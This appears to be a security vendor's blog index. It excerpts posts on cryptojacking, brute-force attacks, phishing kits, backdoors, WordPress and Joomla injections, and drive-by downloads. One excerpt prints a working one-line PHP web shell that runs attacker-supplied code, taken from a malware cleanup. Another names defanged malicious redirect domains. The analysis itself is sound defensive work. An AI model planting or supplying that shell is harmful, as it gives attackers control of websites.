Quttera | BLOG

Cryptocurrency mining malware is gaining popularity among hackers. Attackers are now using GitHub repositories and other well-known repositories for storing and serving the malicious code. On GitHub, the free accounts are being created to commit the obfuscated code and to use it in the injection later. The encrypted infection usually disguises itself as a legitimate jQuery or other familiar library files. It looks like in 2018 this new security threat - cryptojacking is here to stay.

Read more →

Brute-force attacks are a significant portion of the modern web server attack landscape, and the goal of these attacks is to gain access to content management system (CMS) dashboards by guessing admin usernames and passwords. After access has been achieved, hackers gain full control of the compromised website and can use it to send spam, inject malicious JavaScript code into a database, or just redirect all visitors to a third-party resource to generate traffic (also known as traffic hijacking).

Read more →

Background Only a few days ago, we released a write up about hackers using compromised websites for bitcoin mining. Just recently we responded to another hacking incident that uses the website visitor’s computer for bitcoin mining. Bitcoin mining is primarily a means of earning commission on bitcoin transactions. Here is a simplistic explanation of what bitcoin mining is and why hackers want to use your site’s visitors' computers. Each time a bitcoin is bought, traded or sold a record of the transaction must be created.

Read more →

In our recent post about anti-malware myths, we spoke of visitor dependent malware. Three of the methods used to identify which visitors to attack and which to hide from are geolocation awareness, IP address awareness, and language awareness. Malware and phishing content hidden on a business’s website may infect or ignore visitors from some locations but not others. This behavior can help malware to hide on a compromised website for weeks, months, or even years.

Read more →

Protecting Your Online Success with Anti-Malware for Websites ThreatSign users represent almost every industry out there. They are doing a great job, each one in their domain of expertise, in creating products and services that change the lives of their clients making them better. Assistive software solutions that help people with dyslexia and dysgraphia in their struggle to read and write, a biotech company researching new medicines, resort boutiques, healthcare services, and the list goes on.

Read more →

Public Computers, Malware, and I Never Thought I Would Find Malware There! Name seven places where you might find public computers. Let me see if I can guess what you came up with. Hotels, libraries, airports, coffee shops, job search assistance locations, schools, and conference facilities. Let me add one more; the microphone. Let's begin with the realization that some public computers are open to all or mostly all of the public, but even those that have restrictions on who can use them are still public computers.

Read more →

Introduction Bitcoin is a digital currency that has been around since 2008 but was released in 2009. Recently, it has been gaining popularity because of the increasing number of merchants that are accepting bitcoins as a form of payment. Current Bitcoin exchange rate to USD is off the charts and is still climbing higher. How Hackers Use Your Website For BitCoin Mining? One of the ThreatSign customers has recently asked us to monitor their website as they were experiencing high CPU usage.

Read more →

This is not just another phishing attack blog. This is about your business’ well-being should your website be compromised. This about hosting providers who may inadvertently allow multiple client’s websites to be compromised simultaneously, thereby putting their own business at risk. This is about protecting reputations and maintaining accessibility to your website or to the websites that you host. Janet Evans is an American swimmer who won four Olympic gold medals and one silver medal.

Read more →

Ransomware Cyber-Attack Threat A continually improving ransomware attacks is a challenge that IT companies, online businesses, health trusts and even governments are facing. In a short-term, ransomware infection blocks access to essential files on computer or server for weeks and months. Such cyber security incident is dangerous for daily business operation knocking out successful businesses until the hacking recovery. While in long-term, ransomware infection has severe consequences striking business's reputation and leading to commercial and financial collapse.

Read more →

Introduction During recent phishing incident handled by ThreatSign incident response team, a phishing link lead to a discovery of the Phishing Kit. The prompt actions allowed to mitigate the threat and avoid its distribution in the wild. Let's skip the attack background and head to the Phish Kit details: Office 365 PhishKit MD5: b46a0a1035e49e2e9e0218ebbd97fffe The file is a zipped file that contains the whole directory of the phishing kit. Upon loading the files on a web server it shows a familiar Office 365 login page: Upon entering fictional credentials, the fake Office login page made the following requests:

Read more →

Introduction Typically, Backdoor malware is one of the initial stages of the cyber attack. Hackers find vulnerabilities on the site and upload arbitrary files (in this case a Backdoor) to your site and then access it via browser. This is how a plain old Backdoor looks like: For more information about a Backdoor: FilesMan Backdoor Malware On Your Computer Using Legitimate Code Wrappers To Avoid Detection By The Web Malware Scanners The above-mentioned type of backdoor has identifiable signatures which are distributed among the security vendors and then utilized in the traditional (signature-based) detection algorithms.

Read more →

Introduction In the last few days we received lots of JavaScript infection related to page redirection. One of the most common techniques is an inserted JavaScript that targets WordPress CMS. The attacker inserts the link, hxxs://traffictrade[.]life/scripts.js on each page. This link then redirects the visitors to your site to the https://redirect[.]trafficreceiver.club/landing/ where they will see the malicious pop-ups. The interesting part is, there were no infected files on customer's site. The only sign is the code injected into the 'wp_options' table inside the database.

Read more →

Introduction Malicious wrongdoings are not always updated. But the attack vectors are. Hackers are constantly evolving their way of attacks. But once the infiltration succeeds they will just use good old techniques as they are already on your server and no further sophisticated obfuscation is required. We have uncovered a new malware that uses websites to perform DDoS attacks. Malicious code was uploaded to the website and run the bot to perform whatever the hacker wants it to do.

Read more →

Introduction Site after site is being hacked every second that we spent on the internet. Many of these are commercial sites that involve money or sensitive information crucial to the website owner. How are these sites being hacked anyway? First and essential step in the cyber attack planning, that we already stressed in previous posts, is the security information gathering on potential victim websites. Since the majority of the commercial sites are created using CMS (Content Management System), the information on the underlying code is publicly available.

Read more →

PHP is a general server-side scripting language providing very reach arsenal for web development. As a part of it, PHP provides broad capabilities to develop generic shells that can run on almost every website. In the recent website malware cleanup process we detected generic shell that occupied only 18 characters. The following is the code of this shell capable of executing any arbitrary malicious content submitted by attackers. <?php @eval($_POST[yt]); This shell has three major parts @ - PHP Error control operator making PHP interpreter to ignore any occured error (http://php.

Read more →

Introduction Each automated or manual cyber attack starts with gathering as much information about the targeted website or server as possible. Usually, the first step would be the “poc scanning”, which aims to locate and identify an execution environment setup. Website owners tend to neglect the protection of such information and probably not aware of the risk accompanied. In this post, you will learn a simple technique that you can use to improve your website security.

Read more →

Introduction Among the Content Management Systems (CMS) the WordPress is probably the most popular. Our statistics in the Annual Website Malware Report | 2016 show WordPress as leading CMS in 2016. Due to its popularity, it is also prone to vulnerabilities. In the same report it can be seen that 76% of our infected customers were using WordPress. What Are The Main Components Of The WordPress Installation? Each WordPress website has three main parts:

Read more →

Introduction We have encountered a 5-year-old malware while cleaning up one of our customer's website. The malware used a drive-by download method to infect the users. What is Drive-by Download? The drive-by download is an attack vector wherein the users are downloading the payload without their knowledge or consent. It usually happens during the visit to an infected site, reviewing an email or by just clicking a popup advertisement. What does the payload do?

Read more →

Introduction This short post is about recent attack that targets the Joomla! Content Management System's and specifically its templates. We decided that it is worth to spread the word about it after our malware experts resolved numerous similar incidents. Attack On Joomla! Templates The file index.php contains a malicious script that calls its main component like the snippet below: But if you view the site source via the web, the added script just before the head tag looks like this: Note: For stat88b.

Read more →

Introduction As for the definition in CMS (Content Management System), a plugin is a collection of code files that adds one or more features to your website. After you install the core code for your CMS, you can install your choice of plugins. Depending on the nature and the design of your site, you can choose from thousands of plugins available on the internet. Our incident response team encountered one peculiar issue where the website got blacklisted for distributing adware to its visitors.

Read more →